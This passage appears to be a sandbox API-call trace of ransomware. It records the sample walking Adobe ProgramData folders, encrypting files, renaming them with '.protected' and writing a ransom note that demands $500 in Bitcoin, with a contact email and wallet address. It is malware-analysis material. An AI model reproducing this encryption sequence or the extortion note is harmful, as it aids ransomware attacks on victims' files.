[0064.312] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.312] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.312] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.312] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.312] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\.") returned 26 [0064.312] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.312] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0064.312] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.312] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.312] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.313] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.313] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.313] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\..") returned 27 [0064.313] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.313] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.313] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0064.313] lstrcmpiW (lpString1="Acrobat", lpString2="Windows") returned -1 [0064.313] lstrcmpiW (lpString1="Acrobat", lpString2="Program Files") returned -1 [0064.313] lstrcmpiW (lpString1="Acrobat", lpString2="Program Files (x86)") returned -1 [0064.313] lstrcmpiW (lpString1="Acrobat", lpString2="$Recycle.bin") returned 1 [0064.313] lstrcmpiW (lpString1="Acrobat", lpString2="System Volume Information") returned -1 [0064.313] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat") returned 32 [0064.313] lstrcmpW (lpString1="Acrobat", lpString2=".") returned 1 [0064.313] lstrcmpW (lpString1="Acrobat", lpString2="..") returned 1 [0064.313] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\*") returned 34 [0064.313] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0064.313] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.313] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.313] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.313] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.313] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.313] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\.") returned 34 [0064.313] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.313] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.313] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.314] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.314] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.314] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.314] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.314] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\..") returned 35 [0064.314] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.314] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.314] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.314] lstrcmpiW (lpString1="10.0", lpString2="Windows") returned -1 [0064.314] lstrcmpiW (lpString1="10.0", lpString2="Program Files") returned -1 [0064.314] lstrcmpiW (lpString1="10.0", lpString2="Program Files (x86)") returned -1 [0064.314] lstrcmpiW (lpString1="10.0", lpString2="$Recycle.bin") returned 1 [0064.314] lstrcmpiW (lpString1="10.0", lpString2="System Volume Information") returned -1 [0064.314] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0") returned 37 [0064.314] lstrcmpW (lpString1="10.0", lpString2=".") returned 1 [0064.314] lstrcmpW (lpString1="10.0", lpString2="..") returned 1 [0064.314] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\*") returned 39 [0064.314] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0064.314] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.314] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.314] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.314] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.314] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.314] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\.") returned 39 [0064.314] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.314] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0064.314] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.314] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.315] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.315] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.315] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.315] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\..") returned 40 [0064.315] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.315] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.315] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0064.315] lstrcmpiW (lpString1="Replicate", lpString2="Windows") returned -1 [0064.315] lstrcmpiW (lpString1="Replicate", lpString2="Program Files") returned 1 [0064.315] lstrcmpiW (lpString1="Replicate", lpString2="Program Files (x86)") returned 1 [0064.315] lstrcmpiW (lpString1="Replicate", lpString2="$Recycle.bin") returned 1 [0064.315] lstrcmpiW (lpString1="Replicate", lpString2="System Volume Information") returned -1 [0064.315] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate") returned 47 [0064.315] lstrcmpW (lpString1="Replicate", lpString2=".") returned 1 [0064.315] lstrcmpW (lpString1="Replicate", lpString2="..") returned 1 [0064.315] wnsprintfW (in: pszDest=0x4c0b28, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\*") returned 49 [0064.315] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0064.686] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.686] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.686] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.686] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.686] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.686] wnsprintfW (in: pszDest=0x4c0b28, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\.") returned 49 [0064.686] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.686] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0064.686] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.686] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.686] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.686] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.686] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.686] wnsprintfW (in: pszDest=0x4c0b28, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\..") returned 50 [0064.686] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.686] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.686] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0064.686] lstrcmpiW (lpString1="Security", lpString2="Windows") returned -1 [0064.686] lstrcmpiW (lpString1="Security", lpString2="Program Files") returned 1 [0064.686] lstrcmpiW (lpString1="Security", lpString2="Program Files (x86)") returned 1 [0064.686] lstrcmpiW (lpString1="Security", lpString2="$Recycle.bin") returned 1 [0064.686] lstrcmpiW (lpString1="Security", lpString2="System Volume Information") returned -1 [0064.686] wnsprintfW (in: pszDest=0x4c0b28, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned 56 [0064.686] lstrcmpW (lpString1="Security", lpString2=".") returned 1 [0064.686] lstrcmpW (lpString1="Security", lpString2="..") returned 1 [0064.687] wnsprintfW (in: pszDest=0x4d1b78, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*") returned 58 [0064.687] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x4a9210 [0064.687] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.687] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.687] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.687] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.687] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.687] wnsprintfW (in: pszDest=0x4d1b78, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\.") returned 58 [0064.687] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.687] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0064.687] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.687] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.687] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.687] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.687] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.687] wnsprintfW (in: pszDest=0x4d1b78, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\..") returned 59 [0064.687] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.687] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.687] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0064.687] lstrcmpiW (lpString1="directories.acrodata", lpString2="Windows") returned -1 [0064.687] lstrcmpiW (lpString1="directories.acrodata", lpString2="Program Files") returned -1 [0064.687] lstrcmpiW (lpString1="directories.acrodata", lpString2="Program Files (x86)") returned -1 [0064.687] lstrcmpiW (lpString1="directories.acrodata", lpString2="$Recycle.bin") returned 1 [0064.687] lstrcmpiW (lpString1="directories.acrodata", lpString2="System Volume Information") returned -1 [0064.687] wnsprintfW (in: pszDest=0x4d1b78, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata") returned 77 [0064.687] StrStrIW (lpFirst="directories.acrodata", lpSrch=".protected") returned 0x0 [0064.688] lstrcmpW (lpString1="directories.acrodata", lpString2="RESTORE_FILES.txt") returned -1 [0064.688] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0064.688] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0064.688] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0064.688] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata") returned 77 [0064.688] StrStrW (lpFirst="directories.acrodata", lpSrch=".txt") returned 0x0 [0064.688] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata") returned 77 [0064.688] StrStrW (lpFirst="directories.acrodata", lpSrch=".rar") returned 0x0 [0064.688] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata") returned 77 [0064.688] StrStrW (lpFirst="directories.acrodata", lpSrch=".zip") returned 0x0 [0064.688] ReadFile (in: hFile=0x14c, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295ea24*=0x1df, lpOverlapped=0x0) returned 1 [0064.689] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffe21, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.689] WriteFile (in: hFile=0x14c, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x1df, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295ea24*=0x1df, lpOverlapped=0x0) returned 1 [0064.689] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.689] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0064.689] WriteFile (in: hFile=0x14c, lpBuffer=0x4a9250*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a9250*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0064.689] CloseHandle (hObject=0x14c) returned 1 [0064.690] wnsprintfW (in: pszDest=0x4e2bc8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.protected") returned 87 [0064.690] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), lpNewFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.protected" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata.protected")) returned 1 [0064.690] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0064.690] FindClose (in: hFindFile=0x4a9210 | out: hFindFile=0x4a9210) returned 1 [0064.690] wnsprintfW (in: pszDest=0x4d1b78, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\RESTORE_FILES.txt") returned 74 [0064.690] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0064.691] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.691] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0064.692] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0064.692] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0064.692] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0064.692] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0064.692] CloseHandle (hObject=0xd8) returned 1 [0064.692] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0064.692] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0064.692] wnsprintfW (in: pszDest=0x4c0b28, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\RESTORE_FILES.txt") returned 65 [0064.692] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0064.692] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.692] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0064.694] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0064.694] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0064.694] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0064.694] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0064.699] CloseHandle (hObject=0xd4) returned 1 [0064.699] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0064.699] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0064.699] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\RESTORE_FILES.txt") returned 55 [0064.699] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0064.700] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.700] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0064.701] lstrlenA 